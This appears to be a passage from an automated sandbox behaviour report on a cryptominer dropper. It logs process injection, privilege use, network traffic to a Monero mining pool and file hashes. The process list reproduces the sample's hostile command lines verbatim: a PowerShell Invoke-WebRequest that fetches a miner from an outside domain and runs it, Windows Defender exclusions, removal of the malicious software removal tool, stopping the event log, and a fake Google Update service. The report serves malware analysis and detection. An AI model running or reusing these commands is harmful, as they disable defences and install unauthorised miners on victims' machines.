N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4556 wrote to memory of 764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe
PID 4556 wrote to memory of 764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe
PID 4556 wrote to memory of 764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe
PID 1740 wrote to memory of 2932 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2932 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2932 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4464 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4464 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4464 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 2108 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 2108 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 2108 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2108 wrote to memory of 4184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msdr.exe
PID 2108 wrote to memory of 4184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msdr.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 2328 wrote to memory of 612 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 2328 wrote to memory of 668 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 2328 wrote to memory of 964 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 380 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 2328 wrote to memory of 424 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1032 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1116 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1124 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1204 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1236 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2328 wrote to memory of 1288 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1324 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1344 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 1904 wrote to memory of 5092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1904 wrote to memory of 5092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2328 wrote to memory of 1452 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1492 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1556 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1580 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1656 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1712 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1732 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1804 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1816 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1932 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1984 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 2004 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1440 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 2084 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 2328 wrote to memory of 2100 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 2184 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe

"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe

"C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "https://darkslain.com/release/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'

C:\Windows\SysWOW64\msdr.exe

"C:\Windows\System32\msdr.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SY 94.232.249.90:8848 tcp
US 8.8.8.8:53 90.249.232.94.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
SY 94.232.249.90:8848 tcp
US 8.8.8.8:53 www.darkslain.com udp
US 104.21.37.86:443 www.darkslain.com tcp
US 8.8.8.8:53 86.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 darkslain.com udp
US 172.67.206.78:443 darkslain.com tcp
US 8.8.8.8:53 78.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 randomxmonero.auto.nicehash.com udp
US 34.149.22.228:443 randomxmonero.auto.nicehash.com tcp
MD 45.67.229.122:80 45.67.229.122 tcp
US 8.8.8.8:53 228.22.149.34.in-addr.arpa udp
US 8.8.8.8:53 122.229.67.45.in-addr.arpa udp
MD 45.67.229.122:80 45.67.229.122 tcp

Files

memory/2020-0-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/2020-1-0x0000000000567000-0x0000000000572000-memory.dmp

memory/2020-2-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/4556-3-0x0000000001290000-0x00000000012A2000-memory.dmp

memory/2020-4-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/4556-5-0x000000007436E000-0x000000007436F000-memory.dmp

memory/4556-6-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/4556-9-0x0000000006490000-0x000000000652C000-memory.dmp

memory/4556-10-0x0000000006AE0000-0x0000000007084000-memory.dmp

memory/4556-11-0x0000000006530000-0x0000000006596000-memory.dmp

memory/4556-12-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/4556-13-0x0000000007B10000-0x0000000007B86000-memory.dmp

memory/4556-14-0x0000000006A80000-0x0000000006A8E000-memory.dmp

memory/4556-15-0x0000000007A90000-0x0000000007AAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe

MD5 093c50edbabb0dab0b39658a6ac83e2d
SHA1 fecfd0c6d525b8060868db0863b23147cd3e8317
SHA256 ea91b53fbe1f61c3d4e619baeeb3dec455db658c1e9c2c43df2a53d6772e81ba
SHA512 264f72b74cd4c97d2180b9830be6fa938bd036acc88b2e5792c26722729aa16bde4131c359743821d2e4712596e5f79d40ce8ff682c3b41223f296205fd419c1

memory/2932-24-0x0000000002B10000-0x0000000002B46000-memory.dmp

memory/2932-25-0x0000000005720000-0x0000000005D48000-memory.dmp

memory/2932-26-0x00000000056B0000-0x00000000056D2000-memory.dmp

memory/2932-27-0x0000000005DC0000-0x0000000005E26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4sclfqsp.kig.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2932-37-0x0000000005EA0000-0x00000000061F4000-memory.dmp

memory/2932-38-0x0000000006360000-0x000000000637E000-memory.dmp

memory/2932-39-0x0000000006490000-0x00000000064DC000-memory.dmp

memory/2932-50-0x000000006FC40000-0x000000006FC8C000-memory.dmp

memory/2932-60-0x00000000075F0000-0x000000000760E000-memory.dmp

memory/2932-49-0x00000000069D0000-0x0000000006A02000-memory.dmp

memory/2932-61-0x0000000007610000-0x00000000076B3000-memory.dmp

memory/2932-62-0x0000000007D80000-0x00000000083FA000-memory.dmp

memory/2932-63-0x0000000007740000-0x000000000775A000-memory.dmp

memory/2932-64-0x00000000077B0000-0x00000000077BA000-memory.dmp

memory/2932-65-0x00000000079C0000-0x0000000007A56000-memory.dmp

memory/2932-66-0x0000000007940000-0x0000000007951000-memory.dmp

memory/2932-67-0x0000000007970000-0x000000000797E000-memory.dmp

memory/2932-68-0x0000000007980000-0x0000000007994000-memory.dmp

memory/2932-69-0x0000000007A80000-0x0000000007A9A000-memory.dmp

memory/2932-70-0x0000000007A60000-0x0000000007A68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cfbeb7aeaacdb2df4697e97900c8b1fc
SHA1 7223b8b88fe34b12f9fc9655efe862656a44d631
SHA256 8f0e2054d824ef6ae14943beb67fd9f4140679904d0130c6e43826b841ffd880
SHA512 2fc5f58117b23e69639c85b9b67714ec4a2bef3dc2b57dd0e70db4a04e7736c45aa0633b0b1ffb22509ba5d61eb04751ddcd64780cf7b7d896e4edd7e702b088

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
